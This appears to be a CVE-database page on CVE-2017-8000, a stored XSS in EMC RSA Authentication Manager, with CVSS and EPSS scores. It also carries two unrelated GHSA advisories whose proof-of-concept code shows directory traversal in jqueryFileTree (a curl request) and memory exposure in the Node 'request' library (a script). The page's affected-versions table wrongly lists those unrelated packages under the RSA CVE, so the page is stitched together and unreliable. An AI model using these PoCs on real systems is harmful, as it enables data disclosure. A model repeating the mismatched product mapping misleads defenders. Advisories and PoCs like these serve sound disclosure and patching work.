CVE-2017-8000
published 2017-07-17CVE-2017-8000: In EMC RSA Authentication Manager 8.2 SP1 and earlier, a malicious RSA Security Console Administrator could craft a token profile and store the profile name in…
PriorityP421medium4.8CVSS 3.0
AVNACLPRHUIRSCCLILAN
EPSS
0.90%
55.1th percentile
In EMC RSA Authentication Manager 8.2 SP1 and earlier, a malicious RSA Security Console Administrator could craft a token profile and store the profile name in the RSA Authentication Manager database. The profile name could include a crafted script (with an XSS payload) that could be executed when viewing or editing the assigned token profile in the token by another administrator's browser session.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| emc | rsa_authentication_manager | <= 8.2 | — |
| jqueryfiletree_project | jqueryfiletree | 0 – 2.1.5 | — |
| request_project | request | >= 2.2.6 < 2.68.0 | 2.68.0 |
| request_project | request | >= 2.49.0 < 2.68.0 | 2.68.0 |
CVSS provenance
nvdv3.04.8MEDIUMCVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
nvdv2.03.5LOWAV:N/AC:M/Au:S/C:N/I:P/A:N
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-3f4h-fm5j-ghcc: In EMC RSA Authentication Manager 8
ghsa_unreviewed·2022-05-17
CVE-2017-8000 [MEDIUM] CWE-79 GHSA-3f4h-fm5j-ghcc: In EMC RSA Authentication Manager 8
In EMC RSA Authentication Manager 8.2 SP1 and earlier, a malicious RSA Security Console Administrator could craft a token profile and store the profile name in the RSA Authentication Manager database. The profile name could include a crafted script (with an XSS payload) that could be executed when viewing or editing the assigned token profile in the token by another administrator's browser session.
GHSA
jqueryFileTree vulnerable to Directory Traversal
ghsa·2022-05-13
CVE-2017-1000170 [HIGH] CWE-22 jqueryFileTree vulnerable to Directory Traversal
jqueryFileTree vulnerable to Directory Traversal
jqueryFileTree 2.1.5 and older is vulnerable to Directory Traversal
### POC:
```bash
curl 'http://localhost:8000/js/jqueryfiletree-2.1.5/dist/connectors/jqueryFileTree.php' -H 'Referer: xxx' -d "dir=/"
```
GHSA
Remote Memory Exposure in request
ghsa·2018-11-09
CVE-2017-16026 [MEDIUM] CWE-201 Remote Memory Exposure in request
Remote Memory Exposure in request
Affected versions of `request` will disclose local system memory to remote systems in certain circumstances. When a multipart request is made, and the type of `body` is `number`, then a buffer of that size will be allocated and sent to the remote server as the body.
## Proof of Concept
```js
var request = require('request');
var http = require('http');
var serveFunction = function (req, res){
req.on('data', function (data) {
console.log(data)
});
res.end();
};
var server = http.createServer(serveFunction);
server.listen(8000);
request({
method: "POST",
uri: 'http://localhost:8000',
multipart: [{body:500}]
},function(err,res,body){});
```
## Recommendation
Update to version 2.68.0 or later
No detection rules found.
2017-07-17
Published